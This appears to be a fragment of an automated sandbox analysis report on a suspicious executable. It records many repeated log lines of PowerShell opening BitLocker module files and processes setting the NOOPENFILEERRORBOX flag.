Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
